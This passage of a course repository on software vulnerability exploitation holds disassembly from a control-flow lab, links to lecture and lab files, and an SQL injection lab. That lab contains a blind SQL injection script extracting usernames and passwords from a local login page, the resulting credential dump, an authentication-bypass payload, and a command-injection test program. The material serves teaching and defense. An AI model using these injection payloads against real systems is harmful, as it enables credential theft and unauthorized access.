120 | 4004aa: 8b 75 fc mov -0x4(%rbp),%esi 121 | 4004ad: 3b 75 f8 cmp -0x8(%rbp),%esi 122 | 4004b0: 0f 9f c0 setg %al 123 | 4004b3: 24 01 and $0x1,%al 124 | 4004b5: 0f b6 c0 movzbl %al,%eax 125 | 4004b8: 5d pop %rbp 126 | 4004b9: c3 
retq 127 | 4004ba: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1) 128 | 129 | 00000000004004c0 : 130 | 4004c0: 55 push %rbp 131 | 4004c1: 48 89 e5 mov %rsp,%rbp 132 | 4004c4: 48 83 ec 20 sub $0x20,%rsp 133 | 4004c8: 48 89 7d f8 mov %rdi,-0x8(%rbp) 134 | 4004cc: 89 75 f4 mov %esi,-0xc(%rbp) 135 | 4004cf: 48 89 55 e8 mov %rdx,-0x18(%rbp) 136 | 4004d3: 48 8b 55 e8 mov -0x18(%rbp),%rdx 137 | 4004d7: 48 8b 7d f8 mov -0x8(%rbp),%rdi 138 | 4004db: 48 63 45 f4 movslq -0xc(%rbp),%rax 139 | 4004df: 8b 3c 87 mov (%rdi,%rax,4),%edi 140 | 4004e2: 48 8b 45 f8 mov -0x8(%rbp),%rax 141 | 4004e6: 8b 75 f4 mov -0xc(%rbp),%esi 142 | 4004e9: 83 c6 01 add $0x1,%esi 143 | 4004ec: 48 63 ce movslq %esi,%rcx 144 | 4004ef: 8b 34 88 mov (%rax,%rcx,4),%esi 145 | 4004f2: ff d2 callq *%rdx 146 | 4004f4: 31 f6 xor %esi,%esi 147 | 4004f6: 89 45 e4 mov %eax,-0x1c(%rbp) 148 | 4004f9: 89 f0 mov %esi,%eax 149 | 4004fb: 48 83 c4 20 add $0x20,%rsp 150 | 4004ff: 5d pop %rbp 151 | 400500: c3 retq 152 | 400501: 66 66 66 66 66 66 2e data16 data16 data16 data16 data16 nopw %cs:0x0(%rax,%rax,1) 153 | 400508: 0f 1f 84 00 00 00 00 154 | 40050f: 00 155 | 156 | 0000000000400510 : 157 | 400510: 55 push %rbp 158 | 400511: 48 89 e5 mov %rsp,%rbp 159 | 400514: 48 83 ec 20 sub $0x20,%rsp 160 | 400518: 48 b8 80 04 40 00 00 movabs $0x400480,%rax 161 | 40051f: 00 00 00 162 | 400522: 48 89 7d f8 mov %rdi,-0x8(%rbp) 163 | 400526: 48 89 75 f0 mov %rsi,-0x10(%rbp) 164 | 40052a: 89 55 ec mov %edx,-0x14(%rbp) 165 | 40052d: 48 8b 7d f8 mov -0x8(%rbp),%rdi 166 | 400531: 8b 75 ec mov -0x14(%rbp),%esi 167 | 400534: 48 89 c2 mov %rax,%rdx 168 | 400537: e8 84 ff ff ff callq 4004c0 169 | 40053c: 48 ba a0 04 40 00 00 movabs $0x4004a0,%rdx 170 | 400543: 00 00 00 171 | 400546: 48 8b 7d f0 mov -0x10(%rbp),%rdi 172 | 40054a: 8b 75 ec mov -0x14(%rbp),%esi 173 | 40054d: 89 45 e8 mov %eax,-0x18(%rbp) 174 | 400550: e8 6b ff ff ff callq 4004c0 175 | 400555: 31 f6 xor %esi,%esi 176 | 400557: 89 45 e4 mov %eax,-0x1c(%rbp) 177 | 40055a: 89 f0 mov 
%esi,%eax 178 | 40055c: 48 83 c4 20 add $0x20,%rsp 179 | 400560: 5d pop %rbp 180 | 400561: c3 retq 181 | 400562: 66 66 66 66 66 2e 0f data16 data16 data16 data16 nopw %cs:0x0(%rax,%rax,1) 182 | 400569: 1f 84 00 00 00 00 00 183 | 184 | 0000000000400570
: 185 | 400570: 55 push %rbp 186 | 400571: 48 89 e5 mov %rsp,%rbp 187 | 400574: 48 81 ec 80 00 00 00 sub $0x80,%rsp 188 | 40057b: 48 8d 45 90 lea -0x70(%rbp),%rax 189 | 40057f: 48 8d 4d c0 lea -0x40(%rbp),%rcx 190 | 400583: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%rbp) 191 | 40058a: 89 7d f8 mov %edi,-0x8(%rbp) 192 | 40058d: 48 89 75 f0 mov %rsi,-0x10(%rbp) 193 | 400591: 8b 55 f8 mov -0x8(%rbp),%edx 194 | 400594: 48 89 cf mov %rcx,%rdi 195 | 400597: 48 89 c6 mov %rax,%rsi 196 | 40059a: e8 71 ff ff ff callq 400510 197 | 40059f: 31 d2 xor %edx,%edx 198 | 4005a1: 89 45 8c mov %eax,-0x74(%rbp) 199 | 4005a4: 89 d0 mov %edx,%eax 200 | 4005a6: 48 81 c4 80 00 00 00 add $0x80,%rsp 201 | 4005ad: 5d pop %rbp 202 | 4005ae: c3 retq 203 | 4005af: 90 nop 204 | 205 | 00000000004005b0 <__libc_csu_init>: 206 | 4005b0: 41 57 push %r15 207 | 4005b2: 41 56 push %r14 208 | 4005b4: 49 89 d7 mov %rdx,%r15 209 | 4005b7: 41 55 push %r13 210 | 4005b9: 41 54 push %r12 211 | 4005bb: 4c 8d 25 8e 08 20 00 lea 0x20088e(%rip),%r12 # 600e50 <__frame_dummy_init_array_entry> 212 | 4005c2: 55 push %rbp 213 | 4005c3: 48 8d 2d 8e 08 20 00 lea 0x20088e(%rip),%rbp # 600e58 <__init_array_end> 214 | 4005ca: 53 push %rbx 215 | 4005cb: 41 89 fd mov %edi,%r13d 216 | 4005ce: 49 89 f6 mov %rsi,%r14 217 | 4005d1: 4c 29 e5 sub %r12,%rbp 218 | 4005d4: 48 83 ec 08 sub $0x8,%rsp 219 | 4005d8: 48 c1 fd 03 sar $0x3,%rbp 220 | 4005dc: e8 8f fd ff ff callq 400370 <_init> 221 | 4005e1: 48 85 ed test %rbp,%rbp 222 | 4005e4: 74 20 je 400606 <__libc_csu_init+0x56> 223 | 4005e6: 31 db xor %ebx,%ebx 224 | 4005e8: 0f 1f 84 00 00 00 00 nopl 0x0(%rax,%rax,1) 225 | 4005ef: 00 226 | 4005f0: 4c 89 fa mov %r15,%rdx 227 | 4005f3: 4c 89 f6 mov %r14,%rsi 228 | 4005f6: 44 89 ef mov %r13d,%edi 229 | 4005f9: 41 ff 14 dc callq *(%r12,%rbx,8) 230 | 4005fd: 48 83 c3 01 add $0x1,%rbx 231 | 400601: 48 39 dd cmp %rbx,%rbp 232 | 400604: 75 ea jne 4005f0 <__libc_csu_init+0x40> 233 | 400606: 48 83 c4 08 add $0x8,%rsp 234 | 40060a: 5b pop %rbx 235 | 
40060b: 5d pop %rbp 236 | 40060c: 41 5c pop %r12 237 | 40060e: 41 5d pop %r13 238 | 400610: 41 5e pop %r14 239 | 400612: 41 5f pop %r15 240 | 400614: c3 retq 241 | 400615: 90 nop 242 | 400616: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1) 243 | 40061d: 00 00 00 244 | 245 | 0000000000400620 <__libc_csu_fini>: 246 | 400620: f3 c3 repz retq 247 | 248 | Disassembly of section .fini: 249 | 250 | 0000000000400624 <_fini>: 251 | 400624: 48 83 ec 08 sub $0x8,%rsp 252 | 400628: 48 83 c4 08 add $0x8,%rsp 253 | 40062c: c3 retq 254 | -------------------------------------------------------------------------------- /[6]control_flow_integrity/lab6.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[6]control_flow_integrity/lab6.pdf -------------------------------------------------------------------------------- /[6]control_flow_integrity/lab6_ARTEM_KALIAHIN.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[6]control_flow_integrity/lab6_ARTEM_KALIAHIN.pdf -------------------------------------------------------------------------------- /[7]heap_overflow/lab7.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[7]heap_overflow/lab7.pdf -------------------------------------------------------------------------------- /[7]heap_overflow/lab7_ARTEM_KALIAHIN.pdf: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[7]heap_overflow/lab7_ARTEM_KALIAHIN.pdf -------------------------------------------------------------------------------- /[8]type_confusion_java/lab8.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[8]type_confusion_java/lab8.pdf -------------------------------------------------------------------------------- /[9]sql_injection/a.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[9]sql_injection/a.out -------------------------------------------------------------------------------- /[9]sql_injection/dump.py: --------------------------------------------------------------------------------
#!/usr/bin/env python3
# Lab 9: reads the lab database's username and password columns through a
# boolean-based blind SQL injection in login.php's `u` parameter.  The server's
# response differs depending on whether the injected condition held (the
# `cat.JPG` marker is present or not), and that difference is the only
# information channel the script uses.
#
# Defender's view: the root cause is login.php concatenating `u` into its SQL
# text; binding it as a parameter of a prepared statement closes the hole
# entirely.  Operationally, this script issues one request per candidate
# character (up to len(chars) per position, for 100 ids, for two columns), so
# a burst of thousands of near-identical requests carrying SUBSTRING/OR in the
# `u` parameter is an easy signature for web-server log monitoring or a WAF.
import requests

url = 'http://localhost/lab09/login.php'
# candidate alphabet tried for every character position
chars = 'abcdefghijklmnopqrstuvwxyz0123456789\'\"!@#$%^&*()_-=;:~`ABCDEFGHIJKLMNOPQRSTUWXYZ'
# marker that appears in the response only when the injected condition is true
keyword = 'cat.JPG'
# NOTE(review): unpacking an empty list into two names raises ValueError
# (expected 2 values, got 0) as soon as the script starts on Python 3, so the
# loops below are never reached as written.
usernames, passwords = []

#check first 100 rows of usernames
for i in range (1, 101):
    #offset (1-based character position for SUBSTRING)
    j = 1
    is_successful = True
    success_query = ''
    # stop once no candidate matches at position j, i.e. end of the value
    # (or a character outside `chars`)
    while is_successful:
        is_successful = False
        #loop through ascii characters
        for letter in chars:
            #changing ID, offset and letter
            injection = "?u=\" OR id = " + str(i) + " and SUBSTRING(username, " + str(j) + ", 1) = \'" + letter + "\' -- "
            #get request to the localhost
            req_content = requests.get(url+injection).text
            #looking for keyword cat.JPG in response from server
            if req_content.find(keyword) != -1:
                success_query += letter
                is_successful = True
                #incrementing offset
                j += 1
                break
    #appending username to the usernames array after exiting the loop
    usernames.append(success_query)


# same loop as above for the password column
for i in range (1, 101):
    j = 1
    is_successful = True
    success_query = ''
    while is_successful:
        is_successful = False
        for letter in chars:
            injection = "?u=\" OR id = " + str(i) + " and SUBSTRING(password, " + str(j) + ", 1) = \'" + letter + "\' -- "
            req_content = requests.get(url+injection).text
            if req_content.find(keyword) != -1:
                success_query += letter
                is_successful = True
                j += 1
                break
    passwords.append(success_query)


#printing (one line per id, in the format seen in dump.txt)
for i in range (0, 100):
    print('id:', i+1, 'username:', usernames[i], 'password:', passwords[i])
-------------------------------------------------------------------------------- /[9]sql_injection/dump.txt: -------------------------------------------------------------------------------- 1 | id: 1 username: milobuttery password: vagcidjaisrokbeyhujetuj 2 | id: 2 username: fightselfie password: iackmomjargepnamjic_ 3 | id: 3 username: seducingmille password: inwejhofercetkatsyuvjadyeuz= 4 | id: 4 username: alaskadispersal password: bydmughanatanyokzycheukvig 5 | id: 5 username: moussierchunch password: recbarnagnudnejkodyiac 6 | id: 6 username: wheelchairpotty password: udbiecnanfaj9obvub5 7 | id: 7 username: monthdundee password: topvienmiesbeighajkekodyik6 8 | id: 8 username: bulwarkflammable password: yiasedceuwohomyoweafki 9 | id: 9 username: captaintanana password: ler 10 | id: 10 username: robandcone password: traxcisi 11 | id: 11 username: juvenileattack password: nibvejeroandojcek 12 | id: 12 username: syrupoutward password: homductiroxwa 13 | id: 13 username: jurymastcypriot password: tincejrustyamt0 14 | id: 14 username: speltbearing password: speteekuxbabdoijvod3 15 | id: 15 username: commonengross password: moxotghom 16 | id: 16 username: wanderergoose password: ricdyfsooricketlok 17 | 
id: 17 username: swadgeetive password: rhiesyimheerosjecetogg 18 | id: 18 username: infectedeuhedral password: obgerpyeshleomjavdymewbaz` 19 | id: 19 username: undustedoversized password: eerremoa 20 | id: 20 username: mongoosecommand password: wydeepnikdejlehikojso 21 | id: 21 username: fiftyfence password: jicmehibmupopeef8irim) 22 | id: 22 username: oddballsloping password: prawyeawcy 23 | id: 23 username: selectionkite password: odvanyinamkipcevrisencyir 24 | id: 24 username: ladidabenefit password: knetbefjoot0 25 | id: 25 username: rascalcomments password: owghetopyewb1slothea 26 | id: 26 username: oatpishy password: sadomungidud3 27 | id: 27 username: blackwellwhispered password: valipafedhec7 28 | id: 28 username: plusgymnast password: anluefchojbanucbymto 29 | id: 29 username: scunkentime password: godbyaktapsyuolen 30 | id: 30 username: forecabinpushy password: doag;bopoofvacgau 31 | id: 31 username: heinzsediment password: jivtashefjealcobheipnotkez 32 | id: 32 username: pendantconfess password: duercyidtavhenidsodzylseewod1 33 | id: 33 username: freehandnoddle password: yucunliavidbyttuvgahu 34 | id: 34 username: multiplychubby password: desuchontyotyupawec 35 | id: 35 username: woodchatzigzagged password: deewcashdyukneftucedgothtilj4 36 | id: 36 username: boarddrug password: shoadpheft0 37 | id: 37 username: bustwalk password: cacmefeutecpidberluc2quojhic) 38 | id: 38 username: luciditymoustache password: takkorcidoixgiewsyisdothvelye 39 | id: 39 username: patternsboyfriend password: edvuvkaletweit 40 | id: 40 username: slookcloud password: wakjagsoxcivjiatagtatmu 41 | id: 41 username: unwittingcarlisle password: _boolnegyik6ochel 42 | id: 42 username: snuffhockey password: yoghowyogikcilsorhasubwuegvir 43 | id: 43 username: shiningfermium password: hyuksisenignecwironquonhyovma 44 | id: 44 username: lampvisitors password: lejquebbusyubonwiwefithtimt 45 | id: 45 username: profuselydeceased password: dedsanhagoonsav 46 | id: 46 username: wickedfreezing 
password: shucajwautlyhynoam 47 | id: 47 username: draughtremnant password: criveucitucotlavthuashev` 48 | id: 48 username: friednative password: enlirevdiguvu 49 | id: 49 username: blessten password: jufipgaryaynivfockadcoc9 50 | id: 50 username: dodgytidbit password: vevjeephadvev: 51 | id: 51 username: horologiumcovet password: yahipotawkont 52 | id: 52 username: talldiet password: kecpyahikbadorporcyegya 53 | id: 53 username: resamplespiky password: virkyiryotudembohy 54 | id: 54 username: wagconfusion password: 55 | id: 55 username: spitefulmuted password: cruobokanjimhorrowg 56 | id: 56 username: visitorpotato password: eltomjawgondeep 57 | id: 57 username: stubbedchug password: frichereeghoicbedoadmy 58 | id: 58 username: mapsumardale password: sodyoveywuaft 59 | id: 59 username: jarringgiza password: odbamanwacabtetdehicij 60 | id: 60 username: seniormethodical password: vesbuecphofevjahinrivegdab1 61 | id: 61 username: dittyposes password: muilefyicmuig 62 | id: 62 username: widthtraligill password: yeetfrymorfufteniradd 63 | id: 63 username: backlitsugar password: lihyfod 64 | id: 64 username: gristlydraught password: juniarkezmahyodidepfeud 65 | id: 65 username: aloofrespect password: fartongadevodbacnudnu 66 | id: 66 username: yellowstonehatching password: hofolmoydlecs5qui 67 | id: 67 username: monitorscedric password: neddagtyonfibquahas 68 | id: 68 username: bikesmacked password: haubawtovlahoroakkeorg1 69 | id: 69 username: pointsbarcode password: twixgenhikhahoshsicibokaleys 70 | id: 70 username: scopegibbon password: wedoogmudadveglegsids 71 | id: 71 username: splotchygizzard password: nofwevoddiadyahymejbikmyak 72 | id: 72 username: failingacceptor password: rybpyherseilciwi 73 | id: 73 username: webchoopy password: gricijof 74 | id: 74 username: hairunvaried password: yeephorduj 75 | id: 75 username: amospumlumon password: yojkat8fif 76 | id: 76 username: steeringsiren password: sajipbakignoktaicemaiffer2 77 | id: 77 username: degreesix 
password: jeccurm7 78 | id: 78 username: selectiondrone password: moicigdosawhibfaqueyturk2 79 | id: 79 username: nemosterilize password: dibyidmov 80 | id: 80 username: organicvarnish password: yoylkyemsajaickoiwubugtitor 81 | id: 81 username: shiningdrastic password: untuvausfadhoulkia 82 | id: 82 username: lugrants password: ugdejvetvubcowcochiruj 83 | id: 83 username: worshipmouthed password: acojvohufitur 84 | id: 84 username: bullprobing password: badjiujurdeubjegvoi 85 | id: 85 username: unveiledoversweet password: dythowtexigugnathoaf 86 | id: 86 username: yearmugshot password: buedyemghefmedreftyoceukvunaf 87 | id: 87 username: doubleeardrum password: tepsifyidjuep 88 | id: 88 username: anthonyopposed password: dretnerrotvub 89 | id: 89 username: refinishsilver password: jotacheupifduajeftarsh 90 | id: 90 username: exclaimcartel password: ifhivwobeng4 91 | id: 91 username: podsoldier password: reanlibcithkainbokee 92 | id: 92 username: preyscrabble password: juvhotadcarbanou 93 | id: 93 username: glazedgarment password: huryekusjoftyaicaphachevon5 94 | id: 94 username: gogglesroasting password: volaf 95 | id: 95 username: stoppedtransportation password: dawkoitjodtothingyonkyednodcov 96 | id: 96 username: policieswittering password: redcirhagudquevhahestirajooc 97 | id: 97 username: babiessingular password: pevpheundyonhyrewitij0 98 | id: 98 username: admin password: 12356789 99 | id: 99 username: toto password: safyacfoticewquikwavhegednugen 100 | id: 100 username: titi password: noddaim1 101 | -------------------------------------------------------------------------------- /[9]sql_injection/first.txt: -------------------------------------------------------------------------------- 1 | First file! 
2 | -------------------------------------------------------------------------------- /[9]sql_injection/lab9.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[9]sql_injection/lab9.pdf -------------------------------------------------------------------------------- /[9]sql_injection/lab9_ARTEM_KALIAHIN.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[9]sql_injection/lab9_ARTEM_KALIAHIN.pdf -------------------------------------------------------------------------------- /[9]sql_injection/second.txt: -------------------------------------------------------------------------------- 1 | The attacker supplies a username value that first closes the username string with a quotation mark ", then adds any statement that is always true, so that the SQL query returns a $result with more than 0 rows, and finally comments out everything that follows with a double hyphen, which skips the password check. In fact, a query of this type should return the whole table. 
2 | Eventually, the query will look like this: 3 | 4 | $conn->query("SELECT * from users where username == \"" OR 0 = 0--\" and password == \"$password\""); -------------------------------------------------------------------------------- /[9]sql_injection/test.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | int main(int argc, char **argv) { 7 | char cat[] = "cat "; 8 | char *command; 9 | size_t commandLength; 10 | commandLength = strlen(cat) + strlen(argv[1]) + 1; 11 | command = (char *) malloc(commandLength); 12 | strncpy(command, cat, commandLength); 13 | strncat(command, argv[1], (commandLength - strlen(cat)) ); 14 | 15 | int len = strlen(command); 16 | int i = 0; 17 | 18 | while (i < len) { 19 | if (command[i] == ';' || command[i] == '&' || command[i] == '|') { 20 | command[i] = '\0'; 21 | break; 22 | } 23 | i++; 24 | } 25 | system(command); 26 | return (0); 27 | } -------------------------------------------------------------------------------- /lecture00/lecture00.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture00/lecture00.pdf -------------------------------------------------------------------------------- /lecture01/introduction.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture01/introduction.pdf -------------------------------------------------------------------------------- /lecture01/lecture 01 - software vulnerabilities.pdf: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture01/lecture 01 - software vulnerabilities.pdf -------------------------------------------------------------------------------- /lecture02/stack-overflow.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture02/stack-overflow.pdf -------------------------------------------------------------------------------- /lecture03/DEP-expanded.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture03/DEP-expanded.pdf -------------------------------------------------------------------------------- /lecture03/DEP.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture03/DEP.pdf -------------------------------------------------------------------------------- /lecture04/aslr.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture04/aslr.pdf -------------------------------------------------------------------------------- /lecture06/cfi.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture06/cfi.pdf -------------------------------------------------------------------------------- 
/lecture07/heap-overflow.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture07/heap-overflow.pdf -------------------------------------------------------------------------------- /lecture08/type-confusion.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture08/type-confusion.pdf -------------------------------------------------------------------------------- /lecture09/sql-injection.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture09/sql-injection.pdf -------------------------------------------------------------------------------- /lecture10/confused-deputy.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture10/confused-deputy.pdf -------------------------------------------------------------------------------- /lecture11/fuzzing.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture11/fuzzing.pdf -------------------------------------------------------------------------------- /project/Exploitation of a PoC type confusion in C++.pptx: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/project/Exploitation of a PoC type confusion in C++.pptx --------------------------------------------------------------------------------